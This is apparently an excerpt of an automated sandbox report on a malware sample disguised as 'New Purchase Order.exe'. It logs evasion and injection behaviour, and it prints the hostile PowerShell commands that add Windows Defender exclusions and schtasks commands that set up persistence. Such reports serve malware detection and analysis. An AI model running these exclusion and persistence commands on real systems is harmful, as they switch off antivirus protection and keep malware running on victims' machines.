            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116A830 mov eax, dword ptr fs:[00000030h]8_2_0116A830
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D483A mov eax, dword ptr fs:[00000030h]8_2_011D483A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D483A mov eax, dword ptr fs:[00000030h]8_2_011D483A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01160854 mov eax, dword ptr fs:[00000030h]8_2_01160854
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01134859 mov eax, dword ptr fs:[00000030h]8_2_01134859
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01134859 mov eax, dword ptr fs:[00000030h]8_2_01134859
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01142840 mov ecx, dword ptr fs:[00000030h]8_2_01142840
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011BE872 mov eax, dword ptr fs:[00000030h]8_2_011BE872
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011BE872 mov eax, dword ptr fs:[00000030h]8_2_011BE872
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C6870 mov eax, dword ptr fs:[00000030h]8_2_011C6870
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C6870 mov eax, dword ptr fs:[00000030h]8_2_011C6870
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011BC89D mov eax, dword ptr fs:[00000030h]8_2_011BC89D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01130887 mov eax, dword ptr fs:[00000030h]8_2_01130887
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115E8C0 mov eax, dword ptr fs:[00000030h]8_2_0115E8C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_012008C0 mov eax, dword ptr fs:[00000030h]8_2_012008C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116C8F9 mov eax, dword ptr fs:[00000030h]8_2_0116C8F9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116C8F9 mov eax, dword ptr fs:[00000030h]8_2_0116C8F9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FA8E4 mov eax, dword ptr fs:[00000030h]8_2_011FA8E4
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]8_2_011AEB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]8_2_011AEB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]8_2_011AEB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]8_2_011AEB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]8_2_011AEB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]8_2_011AEB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]8_2_011AEB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]8_2_011AEB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011AEB1D mov eax, dword ptr fs:[00000030h]8_2_011AEB1D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204B00 mov eax, dword ptr fs:[00000030h]8_2_01204B00
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115EB20 mov eax, dword ptr fs:[00000030h]8_2_0115EB20
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115EB20 mov eax, dword ptr fs:[00000030h]8_2_0115EB20
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F8B28 mov eax, dword ptr fs:[00000030h]8_2_011F8B28
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F8B28 mov eax, dword ptr fs:[00000030h]8_2_011F8B28
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01128B50 mov eax, dword ptr fs:[00000030h]8_2_01128B50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DEB50 mov eax, dword ptr fs:[00000030h]8_2_011DEB50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E4B4B mov eax, dword ptr fs:[00000030h]8_2_011E4B4B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E4B4B mov eax, dword ptr fs:[00000030h]8_2_011E4B4B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C6B40 mov eax, dword ptr fs:[00000030h]8_2_011C6B40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C6B40 mov eax, dword ptr fs:[00000030h]8_2_011C6B40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FAB40 mov eax, dword ptr fs:[00000030h]8_2_011FAB40
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D8B42 mov eax, dword ptr fs:[00000030h]8_2_011D8B42
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112CB7E mov eax, dword ptr fs:[00000030h]8_2_0112CB7E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01202B57 mov eax, dword ptr fs:[00000030h]8_2_01202B57
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01202B57 mov eax, dword ptr fs:[00000030h]8_2_01202B57
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01202B57 mov eax, dword ptr fs:[00000030h]8_2_01202B57
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01202B57 mov eax, dword ptr fs:[00000030h]8_2_01202B57
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140BBE mov eax, dword ptr fs:[00000030h]8_2_01140BBE
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140BBE mov eax, dword ptr fs:[00000030h]8_2_01140BBE
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E4BB0 mov eax, dword ptr fs:[00000030h]8_2_011E4BB0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E4BB0 mov eax, dword ptr fs:[00000030h]8_2_011E4BB0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DEBD0 mov eax, dword ptr fs:[00000030h]8_2_011DEBD0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01150BCB mov eax, dword ptr fs:[00000030h]8_2_01150BCB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01150BCB mov eax, dword ptr fs:[00000030h]8_2_01150BCB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01150BCB mov eax, dword ptr fs:[00000030h]8_2_01150BCB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01130BCD mov eax, dword ptr fs:[00000030h]8_2_01130BCD
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01130BCD mov eax, dword ptr fs:[00000030h]8_2_01130BCD
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01130BCD mov eax, dword ptr fs:[00000030h]8_2_01130BCD
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01138BF0 mov eax, dword ptr fs:[00000030h]8_2_01138BF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01138BF0 mov eax, dword ptr fs:[00000030h]8_2_01138BF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01138BF0 mov eax, dword ptr fs:[00000030h]8_2_01138BF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115EBFC mov eax, dword ptr fs:[00000030h]8_2_0115EBFC
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011BCBF0 mov eax, dword ptr fs:[00000030h]8_2_011BCBF0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011BCA11 mov eax, dword ptr fs:[00000030h]8_2_011BCA11
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01154A35 mov eax, dword ptr fs:[00000030h]8_2_01154A35
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01154A35 mov eax, dword ptr fs:[00000030h]8_2_01154A35
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116CA24 mov eax, dword ptr fs:[00000030h]8_2_0116CA24
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115EA2E mov eax, dword ptr fs:[00000030h]8_2_0115EA2E
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01136A50 mov eax, dword ptr fs:[00000030h]8_2_01136A50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01136A50 mov eax, dword ptr fs:[00000030h]8_2_01136A50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01136A50 mov eax, dword ptr fs:[00000030h]8_2_01136A50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01136A50 mov eax, dword ptr fs:[00000030h]8_2_01136A50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01136A50 mov eax, dword ptr fs:[00000030h]8_2_01136A50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01136A50 mov eax, dword ptr fs:[00000030h]8_2_01136A50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01136A50 mov eax, dword ptr fs:[00000030h]8_2_01136A50
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140A5B mov eax, dword ptr fs:[00000030h]8_2_01140A5B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140A5B mov eax, dword ptr fs:[00000030h]8_2_01140A5B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011ACA72 mov eax, dword ptr fs:[00000030h]8_2_011ACA72
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011ACA72 mov eax, dword ptr fs:[00000030h]8_2_011ACA72
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116CA6F mov eax, dword ptr fs:[00000030h]8_2_0116CA6F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116CA6F mov eax, dword ptr fs:[00000030h]8_2_0116CA6F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116CA6F mov eax, dword ptr fs:[00000030h]8_2_0116CA6F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DEA60 mov eax, dword ptr fs:[00000030h]8_2_011DEA60
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01168A90 mov edx, dword ptr fs:[00000030h]8_2_01168A90
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]8_2_0113EA80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]8_2_0113EA80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]8_2_0113EA80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]8_2_0113EA80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]8_2_0113EA80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]8_2_0113EA80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]8_2_0113EA80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]8_2_0113EA80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113EA80 mov eax, dword ptr fs:[00000030h]8_2_0113EA80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204A80 mov eax, dword ptr fs:[00000030h]8_2_01204A80
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01138AA0 mov eax, dword ptr fs:[00000030h]8_2_01138AA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01138AA0 mov eax, dword ptr fs:[00000030h]8_2_01138AA0
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeNtCreateUserProcess: Direct from: 0x76F0371C
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\New Purchase Order.exeMemory written: C:\Users\user\Desktop\New Purchase Order.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeMemory written: C:\Users\user\AppData\Roaming\ibDqDkseW.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: NULL target: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeSection loaded: NULL target: C:\Windows\SysWOW64\setupugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe protection: read write
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\setupugc.exeThread register set: target process: 7972
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\setupugc.exeThread APC queued: target process: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp"Jump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeProcess created: C:\Users\user\Desktop\New Purchase Order.exe "C:\Users\user\Desktop\New Purchase Order.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exeProcess created: C:\Users\user\AppData\Roaming\ibDqDkseW.exe "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"Jump to behavior
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exeProcess created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"
            Source: C:\Windows\SysWOW64\setupugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: kdFPsEWDpy.exe, 00000010.00000002.4111347899.0000000001410000.00000002.00000001.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000010.00000000.1833294714.0000000001410000.00000002.00000001.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111591561.00000000013C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: kdFPsEWDpy.exe, 00000010.00000002.4111347899.0000000001410000.00000002.00000001.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000010.00000000.1833294714.0000000001410000.00000002.00000001.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111591561.00000000013C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: kdFPsEWDpy.exe, 00000010.00000002.4111347899.0000000001410000.00000002.00000001.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000010.00000000.1833294714.0000000001410000.00000002.00000001.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111591561.00000000013C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: kdFPsEWDpy.exe, 00000010.00000002.4111347899.0000000001410000.00000002.00000001.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000010.00000000.1833294714.0000000001410000.00000002.00000001.00040000.00000000.sdmp, kdFPsEWDpy.exe, 00000014.00000002.4111591561.00000000013C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Users\user\Desktop\New Purchase Order.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\New Purchase Order.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
